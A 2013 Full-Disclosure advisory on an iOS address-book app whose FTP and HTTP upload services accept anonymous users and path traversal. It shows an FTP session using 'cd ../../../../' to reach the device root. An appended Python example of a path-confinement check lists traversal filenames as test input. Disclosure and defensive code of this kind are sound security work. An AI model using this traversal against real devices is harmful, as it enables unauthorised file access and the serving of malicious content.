
[Full-disclosure] Unauthenticated Remote File Upload via HTTP for lua-Programming language 2.0 on iOS



<html><body><div><b style="font-family: Times; font-size: medium; ">TITLE: 
Unauthenticated Remote File Upload via HTTP for lua-Programming language 2.0 on 
iOS</b></div><div><font face="Times" size="3"><b><br></b></font><span 
style="font-family: Times; font-size: medium; "></span><p style="font-family: 
Times; font-size: medium; ">Date: 8/1/2013</p><p style="font-family: Times; 
font-size: medium; ">Author: Larry W. Cashdollar, @_larry0</p><p 
style="font-family: Times; font-size: medium; "><br></p><p style="font-family: 
Times; font-size: medium; ">Download:</p><ol style="font-family: Times; 
font-size: medium; 
"><li>https://itunes.apple.com/us/app/personal-address-book-helpful/id490328390?mt=8</li><li>http://www.tayutec.com/indexen.html</li></ol><p
 style="font-family: Times; font-size: medium; ">Description: "Features:</p><ol 
style="font-family: Times; font-size: medium; "><li>To create colorful dial 
keyboard- each dial button to display different colors !</li><li>You can rotate 
or scale or move picture when you edit background image , you can set the 
picture fuzzy, long press(2 seconds) to change back image to the window size , 
try quickly!</li><li>You can set different colors for different 
groups!</li><li>You can set friend's head image by click the friend head in the 
friend table!</li><li>You can organise your contacts , support the same name 
,no name , no number , no e-mail.</li></ol><span style="font-family: Times; 
font-size: medium; ">------------- Functions:</span><li style="font-family: 
Times; font-size: medium; ">You can control the background image and color, and 
dial-up voice, text color and shadow, background animation, switch interface 
animation, the number and the order of the main interface of the tab bar to 
create your personalized address book.</li><li style="font-family: Times; 
font-size: medium; ">Send single , group, any more person's message , to 
increase the content of the messages backup system , you can choose the content 
of the message from the backup system , so let the cumbersome process of 
content of the message input to become history.</li><li style="font-family: 
Times; font-size: medium; ">Sliding around to switch tabs or off the interface 
, giving you a more intimate operating experience.</li><li style="font-family: 
Times; font-size: medium; ">Using SMS , Bluetooth, two-dimensional code to 
share contact of individuals 、groups、 any more than ,I believe you will 
love to share contacts.</li><li style="font-family: Times; font-size: medium; 
">Organize contacts and group , you can once to increase or delete multiple 
contacts and group, increased sorting and statistical unstructured contacts , 
easy management of contacts.</li><li style="font-family: Times; font-size: 
medium; ">Using numbers 、name to search , in dial-up interface ,you can click 
to dial and long press to send message from the search results. it's quickly 
and easily.</li><li style="font-family: Times; font-size: medium; ">You can 
upload learning materials to the local on the computer via wifi, support http 
and ftp two upload ways. The file system supports txt, pdf, chm, mp3,zip, gif, 
png, html ..."</li><span style="font-family: Times; font-size: medium; 
"><div><span style="font-family: Times; font-size: medium; 
"><br></span></div><strong>Vulnerabilities</strong>: 'iOSftp' &amp; http 
unauthenticated file uploads. The application is sandboxed, but any remote 
user can read/write to the device's storage.&nbsp;</span><br style="font-family: 
Times; font-size: medium; "><span style="font-family: Times; font-size: medium; 
">The uploaded content is served out of the http server's directory. While the 
http server doesn't process server-side scripts, it is possible to upload and 
serve malicious / illegal content. I would think it's also possible to fill up 
the device's storage as well but did not test it.&nbsp;</span><br 
style="font-family: Times; font-size: medium; "><pre>larry$ ftp 192.168.0.31 10000
Connected to 192.168.0.31.
220 iosFtp server ready.
Name (192.168.0.31:larry): anyone
331 Password required for anyone
Password: 
230 User anyone logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&gt; pwd
Remote directory: 
/private/var/mobile/Applications/C6EA44B6-1285-4C94-B0E0-348309B7322B/Documents/ftp
 *
ftp&gt; cd ../../../../
250 CWD command successful.
ftp&gt; pwd
Remote directory: /private/var/mobile
ftp&gt; cd /
250 CWD command successful.
ftp&gt; pwd
Remote directory: /
ftp&gt; </pre><span style="font-family: Times; font-size: medium; ">* You also 
get path disclosure.&nbsp;</span><br style="font-family: Times; font-size: 
medium; "><span style="font-family: Times; font-size: medium; ">http server 
listening on port 8080 allows arbitrary file writes to 
storage.</span></div><div><br style="font-family: Times; font-size: medium; 
"><span style="font-family: Times; font-size: medium; ">You can create 
directories outside the upload path through the file upload web interface and 
the .. bug. Because the application is sandboxed I was unable to overwrite 
application executables and components, so impact is limited. As stated above 
you can serve malicious content (javascript/html) via 
http.&nbsp;</span></div><div><br style="font-family: Times; font-size: medium; 
"><img src="http://vapid.dhs.org/advisories/webint.gif" style="font-family: 
Times; font-size: medium; "><span style="font-family: Times; font-size: medium; 
"></span><p style="font-family: Times; font-size: medium; ">Vendor: Notified 
8/1/2013, https://twitter.com/tayutec</p><p style="font-family: Times; 
font-size: medium; "><br></p><span style="font-family: Times; font-size: 
medium; ">Advisory: http://vapid.dhs.org/advisories/</span><font face="Times" 
size="3">personal-address-book-XiaoWen.html</font></div></body></html>
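Both findings above come down to the same missing check: the FTP server honours "cd ../../../../" past its Documents/ftp root, and the HTTP upload handler writes wherever a ".." in the submitted path points. The following is an added example (not code from the advisory or from the vendor's application) of the confinement check such an embedded file service needs. The root directory, the request records and the helper names (confine_path, escapes, review_requests) are constructed for illustration; traversal is rejected rather than silently clamped, so that a refused request can be logged.

```python
"""Path confinement for an embedded FTP/HTTP file service.

Added example, not code from the advisory or from the vendor's application.
The root directory, the request records and the helper names are constructed
for illustration; the advisory's real root lived under
/private/var/mobile/Applications/<app id>/Documents/ftp.
"""
import os
import tempfile


class PathEscape(ValueError):
    """The client-supplied path would resolve outside the service root."""


def confine_path(root: str, client_path: str, cwd: str = "/") -> str:
    """Map a client path (FTP CWD argument, upload filename, URL path) to disk.

    ``root`` is the only directory the service may expose; ``cwd`` is the
    client's current directory expressed relative to that root ("/" = root)
    and is assumed to be a value this function previously accepted.
    Returns the real on-disk path, or raises PathEscape.
    """
    root = os.path.realpath(root)
    # An absolute client path is relative to the virtual root, never to "/".
    start = [] if client_path.startswith("/") else [c for c in cwd.split("/") if c]
    stack = list(start)
    for part in client_path.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not stack:  # would climb above the virtual root: refuse, don't clamp
                raise PathEscape(f"{client_path!r} escapes the root (cwd {cwd!r})")
            stack.pop()
            continue
        if "\x00" in part:  # a NUL byte truncates the path in C-level file APIs
            raise PathEscape(f"{client_path!r} contains a NUL byte")
        stack.append(part)
    candidate = os.path.join(root, *stack)
    # Second line of defence: a symlink already inside the root could point
    # outside it, so resolve the candidate and compare it with the real root.
    real = os.path.realpath(candidate)
    if os.path.commonpath([root, real]) != root:
        raise PathEscape(f"{client_path!r} resolves outside the root via a link")
    return real


def escapes(root: str, client_path: str, cwd: str = "/") -> bool:
    """True when the service should refuse the path."""
    try:
        confine_path(root, client_path, cwd)
        return False
    except PathEscape:
        return True


# Constructed request records mirroring the advisory's two findings: the FTP
# session that walked up with "cd ../../../../" and an HTTP upload whose
# filename carries "..".  Each record is (service, cwd, client_path).
SAMPLE_REQUESTS = [
    ("ftp CWD", "/", "../../../../"),
    ("ftp CWD", "/", "/"),
    ("http upload", "/", "notes.txt"),
    ("http upload", "/", "../../Library/evil.html"),
    ("http upload", "/pictures", "../pictures/../notes.txt"),  # stays inside root
]


def review_requests(root: str, requests=SAMPLE_REQUESTS):
    """Return [(service, client_path, 'allow' | 'deny'), ...] for the records."""
    return [
        (service, path, "deny" if escapes(root, path, cwd) else "allow")
        for service, cwd, path in requests
    ]


# Throw-away root so the example runs offline without touching real data.
DEMO_ROOT = os.path.realpath(tempfile.mkdtemp(prefix="upload-root-"))

if __name__ == "__main__":
    for service, path, verdict in review_requests(DEMO_ROOT):
        print(f"{verdict:5} {service:11} {path}")
```

The component walk is what distinguishes "a/../b" (fine, still inside the root) from "../../../../" (climbs above the root and is refused), and the realpath comparison catches the case the walk cannot see: a symlink that was planted inside the root earlier. A server that instead normalises with a plain path join, as the advisory's FTP transcript shows, ends up with its real chroot being the device filesystem and its directory layout disclosed by "pwd".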
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/